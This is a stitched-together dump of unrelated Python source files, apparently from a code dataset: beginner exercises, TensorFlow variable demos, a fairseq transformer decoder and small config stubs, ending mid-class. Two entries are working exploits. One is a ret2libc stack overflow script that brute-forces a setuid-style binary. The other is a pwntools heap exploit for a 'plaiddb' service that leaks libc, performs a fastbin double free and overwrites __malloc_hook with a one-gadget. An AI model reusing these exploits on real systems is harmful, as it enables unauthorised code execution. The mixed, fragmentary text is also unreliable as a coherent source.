list = [['Phil', 'Cannata', 7735647], ['Matthew', 'Clarkson', 9875643], ['Joaquin', 'Casares', 3451878], ['Joaquin', 'Joaquin', 9345879], ['Miggh', 'Tyfine', 124967], ['Joaquin', 'Joaquin', 5123789], ['Joaquin', 'Guadalupe', 8845748], ['Lake', 'Travis', 911], ['Absente', 'Mee', 302740], ['Burbple', 'Durple', 8837232], ['Hes', 'ABob', 8675309], ['See', 'Mee', 302740], ['Jose', 'Nosey', 928223]]
print list
#
=======================================================
### Console Output:
SQL: each SELECT statement within the UNION must have the same number of columns.
SQL: each SELECT statement within the UNION must have the same number of columns.
SQL: each SELECT statement within the UNION must have the same number of columns.
SQL: each SELECT statement within the UNION must have columns of the same data types in the same order.
SQL: each SELECT statement within the UNION must have columns of the same data types in the same order.
0 1 2 3 4 5 6 7 8 9
[['Phil', 'Cannata', 7735647], ['Matthew', 'Clarkson', 9875643], ['Joaquin', 'Casares', 3451878], ['Joaquin', 'Joaquin', 9345879], ['Miggh', 'Tyfine', 124967], ['Joaquin', 'Joaquin', 5123789], ['Joaquin', 'Guadalupe', 8845748], ['Lake', 'Travis', 911], ['Absente', 'Mee', 302740], ['Burbple', 'Durple', 8837232], ['Hes', 'ABob', 8675309], ['See', 'Mee', 302740], ['Jose', 'Nosey', 928223]]
|
22,458 | 369cc76c93e2490c3112b33ef5f388045a7b8b7b | import numpy as np
import argparse
import random
import datetime
from state import State, HOLE
from costs import ones_cost, get_linear_rank_cost
from state_search import alphabeta
import progressbar
from pyswarm import pso
parser = argparse.ArgumentParser(description='Game options.')
parser.add_argument('width', nargs='?', help='Field width', default=4, type=int)
parser.add_argument('height', nargs='?', help='Field height', default=4, type=int)
parser.add_argument('depth', nargs='?', help='Tree search depth', default=3, type=int)
parser.add_argument('iterations', nargs='?', help='PSO iterations', default=10, type=int)
parser.add_argument('swarmsize', nargs='?', help='PSO swarmsize', default=12, type=int)
parser.add_argument('processes', nargs='?', help='Number of processes', default=12, type=int)
args = parser.parse_args()
width = args.width
height = args.height
depth = args.depth
iterations = args.iterations
swarmsize = args.swarmsize
processes = args.processes
def compare_costs(cost1, cost2, rounds=1, depth=5, width=4, height=4):
total_score = 0
bar = progressbar.ProgressBar()
for r in bar(range(rounds)):
s = State(width, height)
if r % 2:
s.player = 3 - s.player
while not s.is_terminal():
next_state_indices = 0
if s.player == 1:
next_state_indices = alphabeta(s, depth, cost1)[1]
else:
next_state_indices = alphabeta(s, depth, cost2)[1]
s = s.expand_state()[random.choice(next_state_indices)]
#s.draw()
total_score += ones_cost(s) > 0
return total_score / rounds
def h_score(cost, rounds, depth, width, height):
return compare_costs(cost, ones_cost, rounds, depth, width, height)
def f(x):
x = x.reshape(height, width)
d = dict()
for i in range(x.shape[0]):
for j in range(x.shape[1]):
d[(i, j)] = x[i, j]
y = h_score(get_linear_rank_cost(d), 100, depth, width, height)
return -y
x = pso(f, -1 * np.ones(height * width), 2 * np.ones(height * width), maxiter=iterations, debug=True, swarmsize=swarmsize, processes=processes)[0]
date = datetime.datetime.now()
filename = './%dx%d_%.4d_%.2d_%.2d_%.2d_%.2d_%.2d' % (width, height, date.year, date.month, date.day, date.hour, date.minute, date.second)
np.save(filename, x)
|
22,459 | ebc34da879390a6392754cd4af0632e1e6247444 | """
while True:
num1 = int(input("Ingrese un número: "))
if num1 >= 10 and num1 <= 20:
break
while True:
num2 = int(input("Ingrese un número: "))
if num2 >= 10 and num2 <= 20:
break
while True:
num3 = int(input("Ingrese un número: "))
if num3 >= 10 and num3 <= 20:
break
while True:
num4 = int(input("Ingrese un número: "))
if num4 >= 10 and num4 <= 20:
break
vector = num1, num2, num3, num4
suma = 0
for i in range(0, 4):
if vector[i] == 14:
suma = suma + 1
print(f"El número 14 aparece en el vector {suma} veces")
print()
a = ("casa", "carro", "beca")
b = ("amarillo", "azul", "rojo")
for tipo, color in zip(a, b):
print(tipo, color)
"""
lista = []
while True:
num1 = int(input("Ingrese un número: "))
if num1 >= 10 and num1 <= 20:
break
lista.append(num1)
while True:
num2 = int(input("Ingrese un número: "))
if num2 >= 10 and num2 <= 20:
break
lista.append(num2)
while True:
num3 = int(input("Ingrese un número: "))
if num3 >= 10 and num3 <= 20:
break
lista.append(num3)
while True:
num4 = int(input("Ingrese un número: "))
if num4 >= 10 and num4 <= 20:
break
lista.append(num4)
suma = 0
for i in range(0, len(lista)):
if lista[i] == 14:
suma = suma + 1
print(f"El número de veces que se repite el número 14 es {suma}") |
22,460 | 0e236d5c8c84eb5bd7e7cbdbe901cd0cb680f7d9 | class solution(object):
'''
Given a digit string, return all possible letter combinations that the number could represent.
'''
def letterCombinations(self, digits):
'''
each element in the returned list represents the input digits.
parse digit one by one. Store corresponding string for all parsed digits.
:param digits: digits string, '123'
:return:
'''
# dict hold digit to string mapping
mappings = {
'2':'abc',
'3':'def',
'4':'ghi',
'5':'jkl',
'6':'mno',
'7':'pqrs',
'8':'tuv',
'9':'wxyz'
}
prev = ['']
for d in digits:
# create new results when adding new digit
tmp = []
for x in prev:
for y in mappings[d]:
tmp.append(x+y)
prev = tmp
return prev
if __name__ == '__main__':
sol = solution()
digits = '234'
print sol.letterCombinations(digits) |
22,461 | e55509732b5c22c71948702fc241111b56ae3440 | import tensorflow as tf
var1 = tf.Variable(1.0,name='firstvar')
print('var1:',var1.name)
var1 = tf.Variable(2.0,name='firstvar')
print('var1:',var1.name)
var2 = tf.Variable(3.0)
print('var2:',var2.name)
var2 = tf.Variable(4.0)
print('var2:',var2.name)
get_var1 = tf.get_variable(name='firstvar',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.3))
print('get_var1:',get_var1.name)
get_var1 = tf.get_variable(name='firstvar1',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.4))
print('get_var1:',get_var1.name)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print('var1=',var1.eval())
print('var2=',var2.eval())
print('get_var1=',get_var1.eval())
# 这个方式给名称赋值同样的名称会报错的
# get_var1 = tf.get_variable(name='a',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.3))
# print('get_var1:',get_var1.name)
# get_var2 = tf.get_variable(name='a',shape=[1],dtype=tf.float32,initializer=tf.constant_initializer(0.4))
# print('get_var1:',get_var1.name)
# 使用variabel_scope 可以把变量分开
import tensorflow as tf
with tf.variable_scope('test1'):
get_var1 = tf.get_variable(name='firstvar',shape=[2],dtype=tf.float32)
with tf.variable_scope('test2'):
get_var2 = tf.get_variable(name='firstvar',shape=[2],dtype=tf.float32)
print('get_var1:',get_var1.name)
print('get_var2:',get_var2.name) |
22,462 | f2cfc957fa513325eea1b987290ad4fae068d2be | # coding=utf-8
import pandas as pd
from align.align_tools import load_boundaries
class AlignMender(object):
@staticmethod
def mend(aligns_dict, predictions, bound_info):
"""
Mend aligns by input params.
:param aligns_dict:
:param predictions:
:param bound_info:
list: [(align_name, bound_index, time), ...]
:return:
new_align_dict: a mended dict correspond to align_dict
bound_dict:
bound_count:
bound_moved:
move_dist_mean: move_dist_sum/bound_moved
"""
wav_names, bound_indices, times = zip(*bound_info)
print('bound_info length: %d' % len(bound_info))
print('predictions length: %d' % len(predictions))
df = pd.DataFrame({'wav_names': wav_names, 'bound_indices': bound_indices,
'times': times, 'predictions': predictions})
bound_dict = load_boundaries(aligns_dict)
bound_count = 0
bound_moved = 0
move_dist_sum = 0
for (name, idx), group in df[['predictions', 'times']].groupby([wav_names, bound_indices]):
preds = list(group.iloc[:, 0])
assert len(preds) == 3
'''judge three predictions, decide new boundary time and frame distance'''
old_time, last_phone, next_phone, old_frame_dist = bound_dict[name][idx]
'''make new boundaries'''
new_time, new_frame_dist, moved, move_dist = AlignMender.__update_boundary(preds, old_frame_dist, old_time)
bound_dict[name][idx] = (new_time, last_phone, next_phone, new_frame_dist)
'''statistic move info'''
if moved:
bound_moved += 1
move_dist_sum += move_dist
bound_count += 1
move_dist_mean = move_dist_sum/bound_moved if bound_moved != 0 else 0
'''refresh boundaries of align_dict'''
new_align_dict = AlignMender.__apply_boundaries(aligns_dict, bound_dict)
return new_align_dict, bound_dict, bound_count, bound_moved, move_dist_mean
@staticmethod
def __update_boundary(preds, old_frame_dist, old_time, fs=16000):
"""
Judge three predictions, decide new boundary time and frame distance
:param preds:
:param old_frame_dist:
:param old_time:
:param fs: frequency of sampling
:return:
new_time,
new_frame_dist
moved,
move_dist
"""
assert len(preds) == 3
new_frame_dist = old_frame_dist
new_time = old_time
moved = False
move_dist = None
func_map = {
'0-0-0': lambda t, d: (t+2*d/fs, d),
'0-0-1': lambda t, d: (t+d/fs, d),
'0-0-2': lambda t, d: (t+d/(fs*2), d/2),
'0-1-2': lambda t, d: (t, d/2),
'0-2-2': lambda t, d: (t-d/(fs*2), d/2),
'1-2-2': lambda t, d: (t-d/fs, d),
'2-2-2': lambda t, d: (t-d/(fs*2), d),
}
key = '{}-{}-{}'.format(*preds)
if key in func_map.keys():
new_time, new_frame_dist = func_map[key](old_time, old_frame_dist)
moved = True
move_dist = new_time-old_time
return new_time, new_frame_dist, moved, move_dist
@staticmethod
def __apply_boundaries(aligns_dict, bound_dict):
for k in aligns_dict.keys():
aligns_dict[k].set_boundaries(bound_dict[k])
# aligns_dict[k] = aligns_dict[k].set_boundaries(bound_dict[k])
return aligns_dict
|
22,463 | 24d73315a435237a694f2b74c155b8552bb81cd8 | #!/usr/bin/python3
"""
unit tests for the bot library
"""
import pytest
import bot
@pytest.mark.parametrize("strategy, l, expected", [
(bot.longest, ["something", "something else", "four score and seven years ago"], "four score and seven years ago"),
(bot.shortest, ["something", "something else", "four score and seven years ago"], "something"),
])
def test_strat(strategy, l, expected):
"""Test that the bot selects the shortest input string."""
assert strategy(*l) == expected
|
22,464 | f889d7e66bf7bd2b2dd2647cf64cdfe91189052e | # 操作列表, 一般包括 增删改查
heroes = ['镜', '嬴政', '露娜', '娜可露露']
# 添加元素的方法
# append
heroes.append('黄忠')
print(heroes) # 在列表最后面追加
# insert(index, object) 在指定位置插入
heroes.insert(1, '小乔')
print(heroes)
newHeroes = ['狄仁杰', '王昭君']
# extend(iterable) 添加可迭代对象
heroes.extend(newHeroes)
print(heroes)
# 删除元素 pop
print(heroes) # ['镜', '小乔', '嬴政', '露娜', '娜可露露', '黄忠', '狄仁杰', '王昭君']
x = heroes.pop() # 删除并返回
print(x) # 王昭君
x = heroes.pop(2) # 删除指定下标的元素
print(x) # 嬴政
print(heroes) # ['镜', '小乔', '露娜', '娜可露露', '黄忠', '狄仁杰']
# remove
heroes.remove('小乔') # 删除不存在的会报错
print(heroes) # ['镜', '露娜', '娜可露露', '黄忠', '狄仁杰']
# del关键字 这个功能强大, 列表删除少用
del heroes[2]
print(heroes) # ['镜', '露娜', '黄忠', '狄仁杰']
# clear
heroes.clear()
print(heroes) # []
# 查询
heroes = ['镜', '小乔', '镜', '露娜', '娜可露露', '黄忠', '狄仁杰']
print(heroes.index('镜')) # 返回下标, 不存在元素报错
print(heroes.count('镜')) # 2, 返回个数
# in 运算符
flag = '小乔' in heroes
print(flag) # True
# 修改元素, 使用下标直接修改
heroes[1] = '镜'
print(heroes) # ['镜', '镜', '镜', '露娜', '娜可露露', '黄忠', '狄仁杰']
|
22,465 | 60900f2f4283bfe6ced108ad1f27aaf65f511546 | from subprocess import call
import struct
libc_base_addr = 0xb75ae000
system_off = 0x00040310
exit_off= 0x00033260
arg_sh = 0x000162bac
system_addr = struct.pack("<I",libc_base_addr+system_off)
exit_addr = struct.pack("<I",libc_base_addr+exit_off)
arg_addr = struct.pack("<I",libc_base_addr+arg_sh)
buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += arg_addr
i = 0
while (i < 200):
print "Try: %s" %i
i += i
ret = call(["/usr/local/bin/ovrflw",buf])
|
22,466 | d852c204e0e0a2004c27d110f87300f520e1909e | from pwn import *
def cmd(c):
p.sendlineafter("and:\n",c)
def show(key):
cmd("GET")
p.sendlineafter("key:\n",key)
def show_all():
cmd("DUMP")
def add(key,size,c="A"):
cmd("PUT")
p.sendlineafter("key:\n",key)
p.sendlineafter("size:\n",str(size))
if size!=0:
p.sendafter("data:\n",c.ljust(size,'\x00'))
def free(key):
cmd("DEL")
p.sendlineafter("key:\n",key)
context.log_level='debug'
context.arch='amd64'
#libc=ELF('./bc.so.6')
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process('./plaiddb')
add("0",0x18)
add("1",0x18)
add("2",0x18)
free("0")
free("1")
add("0",0x38)
add("1",0x400)
add("3",0x88)
add("4",0x38)
free("1")
add("1",0x88)
free("4")
add("4",0x18)
add("n\x0032"*6,0x88,p64(0xdeadbeef))#shrink
free("2")
add("2",0x88)
free("n")
free("3")
# GET IT!
add("9",0x1b8,"OVERLAP")
add("LEAK",0x138,)
show("9")
p.readuntil("s]:\n")
base=u64(p.read(8))-(0x7ffff7dd1b78-0x7ffff7a0d000)
log.warning(hex(base))
free("0")
add("0",0x68,"DOUBLEFREE")
add("3",0x68,"MID")
free("0")
free("3")
free("9")
libc.address=base
add("0",0x68,p64(libc.sym['__malloc_hook']-35))
add("3",0x68)
add("6",0x68)
add("9",0x68,"\x00"*11+p64(0xf02a4+base)+p64(12+libc.sym['realloc'])
)
gdb.attach(p,"b malloc")
cmd("PUT")
p.interactive('n132>')
|
22,467 | 78b0e54e7bc7f184f59aba6f5f97439111bee4e3 | receiverLineId = 'receiverLineId'
channelAccessToken = 'channelAccessToken' |
22,468 | c35de4ca3b45e54d9c7d5463b8beb70ef551110d | __author__ = 'pavel.kiselev'
from multiprocessing.dummy import Pool
def convert_to_list(structure_to_convert):
result_list = []
for item in structure_to_convert:
if type(item) is dict:
key = list(item.keys())[0]
result_list.append(item.get(key))
else:
result_list.append(item)
try:
result_list.sort()
except TypeError:
print('Raised TypeError during list sorting')
return result_list
def convert_to_set(list_to_convert):
result_set = set()
for item in list_to_convert:
if type(item) is dict:
key = list(item.keys())[0]
result_set.add(item.get(key))
else:
result_set.add(item)
return result_set
def parallel_convert_to_set(table_dicts):
pool = Pool(2)
table_sets = pool.map(convert_to_set, table_dicts)
pool.close()
pool.join()
return table_sets
|
22,469 | 5b6b3ea063ed2c2590f3d3af7a330f5e4fd22107 | # runCase.py:运行测试用例(1)运行前会根据配置文件里面配置的是否清空前面的运行结果,如果配置是0,result下面就会保存每次的运行结果,如果配置为1,就会保存最后一次运行结果(就是运行前,把result里面的各个项下面的内容清空了)(2)运行前会去调用caseList.txt,如果里面带#的测试用例文件名称不执行(3)运行后,会自动生成html的报告,并跟进配置文件里面的邮箱配置发送测试结果文件,邮件函数具体编写,请参考我另一篇文章
|
22,470 | 06ff52fffd389a846f2284daba5b581bca41f0c1 | # Python script with classes for the two tables used in our Postgres DB
from . import db
# Expense class object, used to query and insert data in expenses table
class Expense(db.Model):
__tablename__ = 'expenses'
expenseid = db.Column('expenseid',db.Integer,primary_key=True)
category = db.Column('category',db.String(50))
amount = db.Column('amount',db.Numeric(8,2))
duedate = db.Column('duedate',db.Date)
status = db.Column('status',db.String(50))
month = db.Column('month',db.String(50))
year = db.Column('year',db.Integer)
# Paymenty class object, used to query and insert data in payments table
class Payment(db.Model):
__tablename__ = 'payments'
paymentid = db.Column('paymentid',db.Integer,primary_key=True)
roommatename = db.Column('roommatename',db.String(50))
category = db.Column('category',db.String(50))
amount = db.Column('amount',db.Numeric(8,2))
paymentdate = db.Column('paymentdate',db.Date)
status = db.Column('status',db.String(50))
month = db.Column('month',db.String(50))
year = db.Column('year',db.Integer)
|
22,471 | cfb8ddf1702ff72576f3abdee35a2be9924c3bdf | # Generated by Django 2.1.3 on 2018-12-25 14:11
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='HolidayName',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dayname', models.CharField(max_length=150, verbose_name='Название')),
('month', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(12)], verbose_name='Месяц')),
('day', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(31)], verbose_name='День')),
('count', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)], verbose_name='Число дней')),
],
options={
'verbose_name': 'наименование праздника',
'verbose_name_plural': 'наименования праздников',
'ordering': ('month', 'day'),
},
),
migrations.CreateModel(
name='SpecialDay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(db_index=True, unique=True, verbose_name='Дата')),
('daytype', models.CharField(choices=[('HL', 'Выходной день'), ('SH', 'Сокращенный день'), ('WK', 'Рабочий день')], default='HL', max_length=2, verbose_name='Тип дня')),
('comment', models.TextField(blank=True, null=True, verbose_name='Комментарий')),
('dayname', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='workdays.HolidayName', verbose_name='Название')),
],
options={
'verbose_name': 'нестандартный день календаря',
'verbose_name_plural': 'нестандартные дни календаря',
'ordering': ('date',),
},
),
migrations.CreateModel(
name='WorktimeStandards',
fields=[
],
options={
'verbose_name': 'норма рабочего времени',
'verbose_name_plural': 'нормы рабочего времени',
'proxy': True,
'default_permissions': ('view',),
'indexes': [],
},
bases=('workdays.specialday',),
),
]
|
22,472 | 575d2a3daa6d615e935dc647248385d3366d3361 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
from typing import Any, Dict, List, Optional
import torch
import torch.nn as nn
from fairseq import utils
from fairseq.distributed import fsdp_wrap
from fairseq.models import FairseqIncrementalDecoder
from fairseq.models.transformer import TransformerConfig
from fairseq.modules import (
AdaptiveSoftmax,
BaseLayer,
FairseqDropout,
LayerDropModuleList,
LayerNorm,
PositionalEmbedding,
SinusoidalPositionalEmbedding,
)
from fairseq.modules import transformer_layer
from fairseq.modules.checkpoint_activations import checkpoint_wrapper
from fairseq.modules.quant_noise import quant_noise as apply_quant_noise_
from torch import Tensor
import numpy as np
# rewrite name for backward compatibility in `make_generation_fast_`
def module_name_fordropout(module_name: str) -> str:
if module_name == "TransformerDecoderBase":
return "TransformerDecoder"
else:
return module_name
class TransformerDecoderBase(FairseqIncrementalDecoder):
"""
Transformer decoder consisting of *cfg.decoder.layers* layers. Each layer
is a :class:`TransformerDecoderLayer`.
Args:
args (argparse.Namespace): parsed command-line arguments
dictionary (~fairseq.data.Dictionary): decoding dictionary
embed_tokens (torch.nn.Embedding): output embedding
no_encoder_attn (bool, optional): whether to attend to encoder outputs
(default: False).
"""
def __init__(
self,
cfg,
dictionary,
embed_tokens,
no_encoder_attn=False,
output_projection=None,
):
self.cfg = cfg
super().__init__(dictionary)
self.register_buffer("version", torch.Tensor([3]))
self._future_mask = torch.empty(0)
self.dropout_module = FairseqDropout(
cfg.dropout, module_name=module_name_fordropout(self.__class__.__name__)
)
self.decoder_layerdrop = cfg.decoder.layerdrop
self.share_input_output_embed = cfg.share_decoder_input_output_embed
input_embed_dim = embed_tokens.embedding_dim
embed_dim = cfg.decoder.embed_dim
self.embed_dim = embed_dim
self.output_embed_dim = cfg.decoder.output_dim
self.padding_idx = embed_tokens.padding_idx
self.max_target_positions = cfg.max_target_positions
self.embed_tokens = embed_tokens
self.embed_scale = 1.0 if cfg.no_scale_embedding else math.sqrt(embed_dim)
if not cfg.adaptive_input and cfg.quant_noise.pq > 0:
self.quant_noise = apply_quant_noise_(
nn.Linear(embed_dim, embed_dim, bias=False),
cfg.quant_noise.pq,
cfg.quant_noise.pq_block_size,
)
else:
self.quant_noise = None
self.project_in_dim = (
Linear(input_embed_dim, embed_dim, bias=False)
if embed_dim != input_embed_dim
else None
)
self.embed_positions = (
PositionalEmbedding(
self.max_target_positions,
embed_dim,
self.padding_idx,
learned=cfg.decoder.learned_pos,
)
if not cfg.no_token_positional_embeddings
else None
)
if cfg.layernorm_embedding:
self.layernorm_embedding = LayerNorm(embed_dim, export=cfg.export)
else:
self.layernorm_embedding = None
self.cross_self_attention = cfg.cross_self_attention
if self.decoder_layerdrop > 0.0:
self.layers = LayerDropModuleList(p=self.decoder_layerdrop)
else:
self.layers = nn.ModuleList([])
self.layers.extend(
[
self.build_decoder_layer(cfg, no_encoder_attn)
for _ in range(cfg.decoder.layers)
]
)
self.num_layers = len(self.layers)
if cfg.decoder.normalize_before and not cfg.no_decoder_final_norm:
self.layer_norm = LayerNorm(embed_dim, export=cfg.export)
else:
self.layer_norm = None
self.project_out_dim = (
Linear(embed_dim, self.output_embed_dim, bias=False)
if embed_dim != self.output_embed_dim and not cfg.tie_adaptive_weights
else None
)
self.adaptive_softmax = None
self.output_projection = output_projection
if self.output_projection is None:
self.build_output_projection(cfg, dictionary, embed_tokens)
if utils.safe_getattr(cfg, 'deepnet', False):
self.rescale_decoder_only_parameters(cfg)
def rescale_decoder_only_parameters(self, cfg):
def rescale(param, layer_id):
param.mul_(math.sqrt(math.log(len(self.layers) * 2)))
# param.div_(math.sqrt(2.0 * layer_id))
for layer_id in range(len(self.layers)):
layer = self.layers[layer_id]
rescale(layer.self_attn.out_proj.weight.data, layer_id + 1)
rescale(layer.self_attn.v_proj.weight.data, layer_id + 1)
rescale(layer.fc1.weight.data, layer_id + 1)
rescale(layer.fc2.weight.data, layer_id + 1)
return
def build_output_projection(self, cfg, dictionary, embed_tokens):
if cfg.adaptive_softmax_cutoff is not None:
self.adaptive_softmax = AdaptiveSoftmax(
len(dictionary),
self.output_embed_dim,
utils.eval_str_list(cfg.adaptive_softmax_cutoff, type=int),
dropout=cfg.adaptive_softmax_dropout,
adaptive_inputs=embed_tokens if cfg.tie_adaptive_weights else None,
factor=cfg.adaptive_softmax_factor,
tie_proj=cfg.tie_adaptive_proj,
)
elif self.share_input_output_embed:
self.output_projection = nn.Linear(
self.embed_tokens.weight.shape[1],
self.embed_tokens.weight.shape[0],
bias=False,
)
self.output_projection.weight = self.embed_tokens.weight
else:
self.output_projection = nn.Linear(
self.output_embed_dim, len(dictionary), bias=False
)
nn.init.normal_(
self.output_projection.weight, mean=0, std=self.output_embed_dim ** -0.5
)
num_base_layers = cfg.base_layers
for i in range(num_base_layers):
self.layers.insert(
((i + 1) * cfg.decoder.layers) // (num_base_layers + 1),
BaseLayer(cfg),
)
def build_decoder_layer(self, cfg, no_encoder_attn=False):
layer = transformer_layer.TransformerDecoderLayerBase(cfg, no_encoder_attn)
checkpoint = cfg.checkpoint_activations
if checkpoint:
offload_to_cpu = cfg.offload_activations
layer = checkpoint_wrapper(layer, offload_to_cpu=offload_to_cpu)
# if we are checkpointing, enforce that FSDP always wraps the
# checkpointed layer, regardless of layer size
min_params_to_wrap = cfg.min_params_to_wrap if not checkpoint else 0
layer = fsdp_wrap(layer, min_num_params=min_params_to_wrap)
return layer
def forward(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
features_only: bool = False,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
src_lengths: Optional[Any] = None,
return_all_hiddens: bool = False,
):
"""
Args:
prev_output_tokens (LongTensor): previous decoder outputs of shape
`(batch, tgt_len)`, for teacher forcing
encoder_out (optional): output from the encoder, used for
encoder-side attention, should be of size T x B x C
incremental_state (dict): dictionary used for storing state during
:ref:`Incremental decoding`
features_only (bool, optional): only return features without
applying output layer (default: False).
full_context_alignment (bool, optional): don't apply
auto-regressive mask to self-attention (default: False).
Returns:
tuple:
- the decoder's output of shape `(batch, tgt_len, vocab)`
- a dictionary with any model-specific outputs
"""
x, extra = self.extract_features(
prev_output_tokens,
encoder_out=encoder_out,
incremental_state=incremental_state,
full_context_alignment=full_context_alignment,
alignment_layer=alignment_layer,
alignment_heads=alignment_heads,
)
if not features_only:
x = self.output_layer(x)
return x, extra
def extract_features(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]],
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
):
return self.extract_features_scriptable(
prev_output_tokens,
encoder_out,
incremental_state,
full_context_alignment,
alignment_layer,
alignment_heads,
)
"""
A scriptable subclass of this class has an extract_features method and calls
super().extract_features, but super() is not supported in torchscript. A copy of
this function is made to be used in the subclass instead.
"""
def extract_features_scriptable(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]],
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
):
"""
Similar to *forward* but only return features.
Includes several features from "Jointly Learning to Align and
Translate with Transformer Models" (Garg et al., EMNLP 2019).
Args:
full_context_alignment (bool, optional): don't apply
auto-regressive mask to self-attention (default: False).
alignment_layer (int, optional): return mean alignment over
heads at this layer (default: last layer).
alignment_heads (int, optional): only average alignment over
this many heads (default: all heads).
Returns:
tuple:
- the decoder's features of shape `(batch, tgt_len, embed_dim)`
- a dictionary with any model-specific outputs
"""
bs, slen = prev_output_tokens.size()
if alignment_layer is None:
alignment_layer = self.num_layers - 1
enc: Optional[Tensor] = None
padding_mask: Optional[Tensor] = None
if encoder_out is not None and len(encoder_out["encoder_out"]) > 0:
enc = encoder_out["encoder_out"][0]
assert (
enc.size()[1] == bs
), f"Expected enc.shape == (t, {bs}, c) got {enc.shape}"
if encoder_out is not None and len(encoder_out["encoder_padding_mask"]) > 0:
padding_mask = encoder_out["encoder_padding_mask"][0]
# embed positions
positions = None
if self.embed_positions is not None:
positions = self.embed_positions(
prev_output_tokens, incremental_state=incremental_state
)
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# embed tokens and positions
x = self.embed_scale * self.embed_tokens(prev_output_tokens)
if self.quant_noise is not None:
x = self.quant_noise(x)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions
if self.layernorm_embedding is not None:
x = self.layernorm_embedding(x)
x = self.dropout_module(x)
# B x T x C -> T x B x C
x = x.transpose(0, 1)
self_attn_padding_mask: Optional[Tensor] = None
if self.cross_self_attention or prev_output_tokens.eq(self.padding_idx).any():
self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx)
# decoder layers
attn: Optional[Tensor] = None
inner_states: List[Optional[Tensor]] = [x]
for idx, layer in enumerate(self.layers):
if incremental_state is None and not full_context_alignment:
self_attn_mask = self.buffered_future_mask(x)
else:
self_attn_mask = None
x, layer_attn, _ = layer(
x,
enc,
padding_mask,
incremental_state,
self_attn_mask=self_attn_mask,
self_attn_padding_mask=self_attn_padding_mask,
need_attn=bool((idx == alignment_layer)),
need_head_weights=bool((idx == alignment_layer)),
)
inner_states.append(x)
if layer_attn is not None and idx == alignment_layer:
attn = layer_attn.float().to(x)
if attn is not None:
if alignment_heads is not None:
attn = attn[:alignment_heads]
# average probabilities over heads
attn = attn.mean(dim=0)
if self.layer_norm is not None:
x = self.layer_norm(x)
if self.alpha is not None:
x = torch.mul(self.alpha, x)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
if self.project_out_dim is not None:
x = self.project_out_dim(x)
return x, {"attn": [attn], "inner_states": inner_states}
def output_layer(self, features):
"""Project features to the vocabulary size."""
if self.adaptive_softmax is None:
# project back to size of vocabulary
return self.output_projection(features)
else:
return features
def max_positions(self):
"""Maximum output length supported by the decoder."""
if self.embed_positions is None:
return self.max_target_positions
return min(self.max_target_positions, self.embed_positions.max_positions)
def buffered_future_mask(self, tensor):
dim = tensor.size(0)
# self._future_mask.device != tensor.device is not working in TorchScript. This is a workaround.
if (
self._future_mask.size(0) == 0
or (not self._future_mask.device == tensor.device)
or self._future_mask.size(0) < dim
):
self._future_mask = torch.triu(
utils.fill_with_neg_inf(torch.zeros([dim, dim])), 1
)
self._future_mask = self._future_mask.to(tensor)
return self._future_mask[:dim, :dim]
def upgrade_state_dict_named(self, state_dict, name):
"""Upgrade a (possibly old) state dict for new versions of fairseq."""
if isinstance(self.embed_positions, SinusoidalPositionalEmbedding):
weights_key = "{}.embed_positions.weights".format(name)
if weights_key in state_dict:
del state_dict[weights_key]
state_dict[
"{}.embed_positions._float_tensor".format(name)
] = torch.FloatTensor(1)
if f"{name}.output_projection.weight" not in state_dict:
if self.share_input_output_embed:
embed_out_key = f"{name}.embed_tokens.weight"
else:
embed_out_key = f"{name}.embed_out"
if embed_out_key in state_dict:
state_dict[f"{name}.output_projection.weight"] = state_dict[
embed_out_key
]
if not self.share_input_output_embed:
del state_dict[embed_out_key]
for i in range(self.num_layers):
# update layer norms
layer_norm_map = {
"0": "self_attn_layer_norm",
"1": "encoder_attn_layer_norm",
"2": "final_layer_norm",
}
for old, new in layer_norm_map.items():
for m in ("weight", "bias"):
k = "{}.layers.{}.layer_norms.{}.{}".format(name, i, old, m)
if k in state_dict:
state_dict[
"{}.layers.{}.{}.{}".format(name, i, new, m)
] = state_dict[k]
del state_dict[k]
version_key = "{}.version".format(name)
if utils.item(state_dict.get(version_key, torch.Tensor([1]))[0]) <= 2:
# earlier checkpoints did not normalize after the stack of layers
self.layer_norm = None
self.normalize = False
state_dict[version_key] = torch.Tensor([1])
return state_dict
def Linear(in_features, out_features, bias=True):
m = nn.Linear(in_features, out_features, bias)
nn.init.xavier_uniform_(m.weight)
if bias:
nn.init.constant_(m.bias, 0.0)
return m
class TransformerDecoder(TransformerDecoderBase):
def __init__(
self,
args,
dictionary,
embed_tokens,
no_encoder_attn=False,
